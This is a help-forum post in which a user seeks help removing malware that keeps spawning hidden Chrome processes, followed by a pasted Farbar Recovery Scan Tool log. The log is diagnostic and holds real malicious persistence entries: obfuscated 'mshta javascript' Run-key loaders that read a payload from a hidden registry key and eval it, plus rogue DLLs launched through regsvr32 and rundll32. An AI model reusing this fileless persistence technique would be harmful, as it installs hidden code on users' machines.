Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Laptop/Chrome Virus Issue [Solved]

Started by xander291190 , Sep 02 2015 05:14 PM

chrome

This topic is locked

#1
xander291190

Posted 02 September 2015 - 05:14 PM

Member

Member
13 posts

Hi,

This is my first time posting to the forum, so firstly my apologies if i have posted in the wrong area. My friend recommended the forum to try and solve my problem. I have read the Malware and Spyware and have run the software, I have pasted the reports at the end. Furthermore I have screenshots available upon request showing my Task Manager and the problem described below.

My issue appears to be some sort of Virus/Malware/Spyware that affects my Google Chrome and system processing. It started a few days ago when i noticed my laptop running very slow and freezing constantly. I checked my task manager and noticed the CPU and Memory were almost at 100%, due to as many as 15 different processes all related to Chrome without having the browser open.

I'm aware Chrome functions differently with it's processes' compared to other browsers, but after expanding a few of them i noticed some of them were very strange. There were multiple 'New tab' processes, again the browser is unopened on my desktop, but the most concerning ones were named 'video-promo.org'

I have tried to end all the processes' but they quickly start again, I have run various programs that claim to remove and Malware or Spyware but the problem continues. The only thing that seemed to work was when I somehow managed ton uninstall Chrome, the laptop worked fine. However when Chrome was reinstalled the problem started exactly as before.

I'm stuck with what to do next and any help that you guys can provide will be much appreciated.

Thanks in advance!

Reports:

FRST:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-08-2015

Ran by user (administrator) on HP (03-09-2015 08:22:52)

Running from C:\Users\user\Downloads

Loaded Profiles: user (Available Profiles: user)

Platform: Windows 8.1 Connected (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: Chrome)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe

(AMD) C:\Windows\System32\atiesrxx.exe

(AMD) C:\Windows\System32\atieclxx.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

() C:\Program Files\ATI Technologies\ATI.ACE\a4\AdaptiveSleepService.exe

(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe

(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe

(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe

(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe

(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe

(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe

(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe

(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe

(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe

(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe

(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe

(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe

(BitTorrent Inc.) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe

(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe

(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

() C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe

(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe

(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe

(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe

(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe

(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe

(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe

Failed to access process -> WerFault.exe

(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\System32\wsqmcons.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Failed to access process -> SearchProtocolHost.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7535832 2014-02-13] (Realtek Semiconductor)

HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [704344 2015-02-05] (Alps Electric Co., Ltd.)

HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-29] (Hewlett-Packard)

HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-29] (Hewlett-Packard)

HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-29] (Hewlett-Packard)

HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-18] (Advanced Micro Devices, Inc.)

HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [1045304 2013-10-09] (Hewlett-Packard Development Company, L.P.)

HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe [40184 2015-02-27] (Panda Security, S.L.)

HKLM-x32\...\Run: [**218bad7d<*>] => mshta javascript:iyQT4VY="CK3O";V67s=new%20ActiveXObject("WScript.Shell");FY0Tn0JM="2iHgm";xV2Ij2=V67s.RegRead("HKLM\\software\\Wow6432Node\\fa4c9d5698\\0d3cffd4");VZi3hnSgk9="pVE";eval(xV2Ij2);Z5fWFm (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)

HKLM\...\Winlogon: [Userinit] C:\Windows\SysWOW64\userinit.exe,

HKLM\...\Policies\Explorer\Run: [1853556740] => C:\ProgramData\msbogj.exe [76288 2015-06-16] ()

HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0

HKLM\...\Policies\Explorer: [HideSCAHealth] 0

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [uTorrent] => C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe [1696096 2015-08-28] (BitTorrent Inc.)

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2899136 2015-08-20] (Valve Corporation)

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**218bad7d<*>] => mshta javascript:W9aS1KCR="UUw4";y9o8=new%20ActiveXObject("WScript.Shell");Vc5AeYFkq="MOb";q6p3jI=y9o8.RegRead("HKCU\\software\\fa4c9d5698\\0d3cffd4");KZf98Edu="zLL";eval(q6p3jI);IcaPSE6="4ifrZ3"; <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**c1b2a7eb<*>] => mshta javascript:gF0Iv2HVDd="a";A8e=new%20ActiveXObject("WScript.Shell");g7SKg0Rg="IcEJFbpa";J1oi1c=A8e.RegRead("HKCU\\software\\7e31c7fb1f\\121bdb0c");w9gONqNan6="GHrQ";eval(J1oi1c);ZAiqko6="z9mBn9"; <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**da02f0de<*>] => mshta javascript:fxZCP3i="kxqXBLRASQ";y4I9=new%20ActiveXObject("WScript.Shell");mA3WxwAa="o";l5rWG0=y4I9.RegRead("HKCU\\software\\7e31c7fb1f\\121bdb0c");K8L5tFFO="2tv";eval(l5rWG0);Tq2YCV1mv="hiPfYH6" (the data entry has 1 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [YbPack] => regsvr32.exe C:\Users\user\AppData\Local\YbPack\comNetengine.dll <===== ATTENTION

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Eqtion] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Ufrmedia\frivolled.dll

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [GoogleUpdate] => C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe [62042624 2015-09-03] ()

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [FireFoxUpdServeisSystem] => C:\Users\user\AppData\Roaming\FireFoxUpdServeis\[email protected] [66560 2015-09-02] ()

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Update] => C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe [62042624 2015-09-03] ()

HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [xzhw] => rundll32 "C:\Users\user\AppData\Roaming\scrrunp.dll",obtmokiq

ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

Tcpip\..\Interfaces\{0E2E738C-AA2B-43E7-AC64-518FDCB854EF}: [DhcpNameServer] 192.168.1.1

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14

HKU\S-1-5-21-934653896-176862922-3437185597-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14

HKU\S-1-5-21-934653896-176862922-3437185597-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14

SearchScopes: HKU\S-1-5-21-934653896-176862922-3437185597-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}

SearchScopes: HKU\S-1-5-21-934653896-176862922-3437185597-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}

FireFox:

========

FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-06] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-09-03] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-09-03] (Google Inc.)

FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)

Chrome:

=======

CHR StartupUrls: Default -> "hxxp://www.facebook.com/"

CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}

CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Slides) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-16]

CHR Extension: (Google Docs) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-16]

CHR Extension: (Google Drive) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-16]

CHR Extension: (YouTube) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-16]

CHR Extension: (Google Search) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-16]

CHR Extension: (Google Sheets) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-16]

CHR Extension: (Google Docs Offline) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-03]

CHR Extension: (AdBlock) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-07-16]

CHR Extension: (Chrome Hotword Shared Module) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-16]

CHR Extension: (Chrome Web Store Payments) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-16]

CHR Extension: (Gmail) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-16]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdaptiveSleepService; C:\Program Files\ATI Technologies\ATI.ACE\A4\AdaptiveSleepService.exe [140288 2014-04-18] () [File not signed]

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-04-18] (Advanced Micro Devices, Inc.) [File not signed]

R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [87384 2015-02-05] (Alps Electric Co., Ltd.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [312448 2013-08-07] (Windows ® Win 7 DDK provider) [File not signed]

R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [1039160 2013-10-09] (Hewlett-Packard Development Company, L.P.)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)

R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe [142584 2015-02-27] (Panda Security, S.L.)

R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-29] (Softex Inc.) [File not signed]

R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [66808 2014-10-09] (Panda Security, S.L.)

R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe [38136 2015-02-27] (Panda Security, S.L.)

R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-02-13] (Realtek Semiconductor)

S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2014-04-02] (Microsoft Corporation)

S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-04] (Microsoft Corporation)

S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-04] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AmdAS4; C:\Windows\System32\drivers\AmdAS4.sys [17640 2013-10-24] (Advanced Micro Devices, INC.)

R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36608 2013-12-14] (Advanced Micro Devices, Inc.)

R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3858944 2013-10-17] (Qualcomm Atheros Communications, Inc.)

R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWB6.sys [222720 2014-03-12] (Advanced Micro Devices)

R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [226304 2014-03-18] (Microsoft Corporation)

R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-06] (CyberLink)

S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)

R1 gfilterdrv; C:\Windows\System32\drivers\gfilterdrv.sys [58168 2015-07-08] (Windows ® Win 7 DDK provider)

S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-09-03] ()

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [113880 2015-09-03] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)

R1 NNSALPC; C:\Windows\System32\DRIVERS\NNSAlpc.sys [93968 2015-02-10] (Panda Security, S.L.)

R1 NNSHTTP; C:\Windows\System32\DRIVERS\NNSHttp.sys [202000 2015-02-10] (Panda Security, S.L.)

R1 NNSHTTPS; C:\Windows\System32\DRIVERS\NNSHttps.sys [110864 2015-02-10] (Panda Security, S.L.)

R1 NNSIDS; C:\Windows\System32\DRIVERS\NNSIds.sys [116496 2015-02-10] (Panda Security, S.L.)

R1 NNSNAHSL; C:\Windows\system32\DRIVERS\NNSNAHSL.sys [49936 2014-12-31] (Panda Security, S.L.)

R1 NNSPICC; C:\Windows\System32\DRIVERS\NNSPicc.sys [99600 2015-02-10] (Panda Security, S.L.)

R1 NNSPIHSW; C:\Windows\System32\DRIVERS\NNSPihsw.sys [69904 2015-02-10] (Panda Security, S.L.)

R1 NNSPOP3; C:\Windows\System32\DRIVERS\NNSPop3.sys [124176 2015-02-10] (Panda Security, S.L.)

R1 NNSPROT; C:\Windows\System32\DRIVERS\NNSProt.sys [299792 2015-02-10] (Panda Security, S.L.)

R1 NNSPRV; C:\Windows\System32\DRIVERS\NNSPrv.sys [166160 2015-02-10] (Panda Security, S.L.)

R1 NNSSMTP; C:\Windows\System32\DRIVERS\NNSSmtp.sys [113424 2015-02-10] (Panda Security, S.L.)

R1 NNSSTRM; C:\Windows\System32\DRIVERS\NNSStrm.sys [257296 2015-02-10] (Panda Security, S.L.)

R1 NNSTLSC; C:\Windows\System32\DRIVERS\NNSTlsc.sys [106256 2015-02-10] (Panda Security, S.L.)

R2 PSINAflt; C:\Windows\System32\DRIVERS\PSINAflt.sys [163576 2015-06-18] (Panda Security, S.L.) [File not signed]

R2 PSINFile; C:\Windows\System32\DRIVERS\PSINFile.sys [121616 2015-02-26] (Panda Security, S.L.)

R1 PSINKNC; C:\Windows\System32\DRIVERS\psinknc.sys [197392 2015-02-26] (Panda Security, S.L.)

R2 PSINProc; C:\Windows\System32\DRIVERS\PSINProc.sys [124176 2015-02-26] (Panda Security, S.L.)

R2 PSINProt; C:\Windows\System32\DRIVERS\PSINProt.sys [133904 2015-02-26] (Panda Security, S.L.)

R2 PSINReg; C:\Windows\System32\DRIVERS\PSINReg.sys [107792 2015-02-26] (Panda Security, S.L.)

S3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [61712 2015-05-22] (Panda Security, S.L.)

R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [291544 2014-01-04] (Realtek Semiconductor Corp.)

S3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [1936088 2013-08-01] (Realtek Semiconductor Corporation )

R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-23] (Hewlett-Packard Development Company, L.P.)

U3 McAPExe; no ImagePath

U3 McMPFSvc; no ImagePath

U3 McNaiAnn; no ImagePath

U3 mcpltsvc; no ImagePath

U3 mfecore; no ImagePath

U3 MSK80Service; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-03 18:55 - 2015-09-03 18:55 - 00000000 _____ C:\Recovery.txt

2015-09-03 18:52 - 2015-09-03 18:52 - 00262144 _____ C:\Windows\system32\config\userdiff

2015-09-03 18:41 - 2015-09-03 18:41 - 00000000 ____D C:\$WINDOWS.~BT

2015-09-03 08:22 - 2015-09-03 08:36 - 00037008 _____ C:\Users\user\Downloads\FRST.txt

2015-09-03 08:20 - 2015-09-03 08:24 - 00000000 ____D C:\FRST

2015-09-03 08:00 - 2015-09-03 08:01 - 02188800 _____ (Farbar) C:\Users\user\Downloads\FRST64.exe

2015-09-03 07:46 - 2015-09-03 07:46 - 04116296 _____ (Google) C:\Users\user\Downloads\chrome_cleanup_tool.exe

2015-09-03 04:00 - 2015-09-03 04:00 - 00280760 _____ C:\Windows\Minidump\090315-21953-01.dmp

2015-09-03 02:24 - 2015-09-03 02:24 - 00043664 _____ C:\Windows\system32\Drivers\hitmanpro37.sys

2015-09-03 02:20 - 2015-09-03 02:24 - 00000000 ____D C:\ProgramData\HitmanPro

2015-09-03 02:16 - 2015-09-03 08:48 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\ProgramData\Malwarebytes

2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware

2015-09-03 02:16 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2015-09-03 02:16 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys

2015-09-03 02:16 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys

2015-09-03 02:15 - 2015-09-03 02:15 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\user\Downloads\mbam-setup-2.1.8.1057.exe

2015-09-03 02:15 - 2015-09-03 02:15 - 11352032 _____ (SurfRight B.V.) C:\Users\user\Downloads\HitmanPro_x64.exe

2015-09-03 01:58 - 2015-09-03 02:04 - 00000000 ____D C:\AdwCleaner

2015-09-03 01:57 - 2015-09-03 01:57 - 01654272 _____ C:\Users\user\Downloads\adwcleaner_5.005.exe

2015-09-03 01:49 - 2015-09-03 01:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome

2015-09-03 01:47 - 2015-09-03 07:53 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2015-09-03 01:47 - 2015-09-03 07:17 - 00000896 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2015-09-03 01:47 - 2015-09-03 01:47 - 00003872 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2015-09-03 01:47 - 2015-09-03 01:47 - 00003636 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2015-09-03 01:07 - 2015-09-03 01:07 - 00453120 __RSH C:\Users\user\AppData\Roaming\scrrunp.dll

2015-09-02 13:19 - 2015-09-02 17:49 - 00000000 __RHD C:\ESD

2015-09-02 05:22 - 2015-09-02 05:22 - 00000000 ____D C:\Users\user\AppData\Roaming\FireFoxUpdServeis

2015-09-01 03:54 - 2015-09-01 03:55 - 00843976 _____ C:\Windows\Minidump\090115-21859-01.dmp

2015-08-31 09:02 - 2015-08-31 09:02 - 00280760 _____ C:\Windows\Minidump\083115-27203-01.dmp

2015-08-30 10:39 - 2015-09-03 01:20 - 00000712 ____H C:\ProgramData\@system.temp

2015-08-30 10:38 - 2015-09-03 07:18 - 00000000 ____D C:\Users\user\AppData\Roaming\GoogleUpdate

2015-08-30 10:38 - 2015-09-03 01:20 - 00000448 ____H C:\ProgramData\@system3.att

2015-08-30 10:38 - 2015-08-30 10:38 - 00000464 ____H C:\Users\user\AppData\Roaming\½ž’“Ó™œ‰

2015-08-29 23:07 - 2015-08-29 23:07 - 00280760 _____ C:\Windows\Minidump\082915-39062-01.dmp

2015-08-29 13:45 - 2015-08-29 13:45 - 00280704 _____ C:\Windows\Minidump\082915-30109-01.dmp

2015-08-18 23:51 - 2015-08-18 23:56 - 00000000 ____D C:\ProgramData\pauhu

2015-08-17 02:34 - 2015-08-17 02:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HoMM3 HD

2015-08-16 21:30 - 2015-08-16 21:30 - 00000364 _____ C:\Windows\mplaynow.log

2015-08-16 21:30 - 2015-08-16 21:30 - 00000000 ____D C:\Windows\wb

2015-08-15 15:24 - 2015-08-15 15:24 - 00280704 _____ C:\Windows\Minidump\081515-20640-01.dmp

2015-08-14 18:15 - 2015-09-02 05:12 - 00000000 ____D C:\Users\user\AppData\Local\YbPack

2015-08-14 17:25 - 2015-09-02 04:48 - 00000000 ____D C:\Users\user\AppData\Local\Ufrmedia

2015-08-12 15:01 - 2015-09-03 04:00 - 519323636 _____ C:\Windows\MEMORY.DMP

2015-08-12 15:01 - 2015-09-03 04:00 - 00000000 ____D C:\Windows\Minidump

2015-08-12 15:01 - 2015-08-12 15:01 - 00280704 _____ C:\Windows\Minidump\081215-18234-01.dmp

2015-08-11 13:46 - 2015-08-11 13:46 - 00000000 ____D C:\Users\user\Documents\Ubisoft

2015-08-11 13:46 - 2015-08-11 13:46 - 00000000 ____D C:\Users\user\AppData\Roaming\Steam

2015-08-11 13:41 - 2015-09-03 04:00 - 00006215 _____ C:\Windows\setupact.log

2015-08-11 13:41 - 2015-09-03 04:00 - 00001836 _____ C:\Windows\PFRO.log

2015-08-11 13:41 - 2015-08-11 13:41 - 00000000 _____ C:\Windows\setuperr.log

2015-08-11 13:33 - 2015-09-02 16:40 - 00016758 _____ C:\Windows\WindowsUpdate.log

2015-08-11 13:33 - 2015-08-16 21:45 - 00466456 _____ (Creative Labs) C:\Windows\system32\wrap_oal.dll

2015-08-11 13:33 - 2015-08-16 21:45 - 00444952 _____ (Creative Labs) C:\Windows\SysWOW64\wrap_oal.dll

2015-08-11 13:33 - 2015-08-16 21:45 - 00122904 _____ (Portions © Creative Labs Inc. and NVIDIA Corp.) C:\Windows\system32\OpenAL32.dll

2015-08-11 13:33 - 2015-08-16 21:45 - 00109080 _____ (Portions © Creative Labs Inc. and NVIDIA Corp.) C:\Windows\SysWOW64\OpenAL32.dll

2015-08-11 13:33 - 2015-08-11 13:33 - 00000000 ____D C:\Program Files (x86)\OpenAL

2015-08-10 16:20 - 2015-08-10 16:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anvisoft

2015-08-10 16:20 - 2015-08-10 16:27 - 00000000 ____D C:\Program Files (x86)\Anvisoft

2015-08-10 14:27 - 2015-08-10 14:27 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf

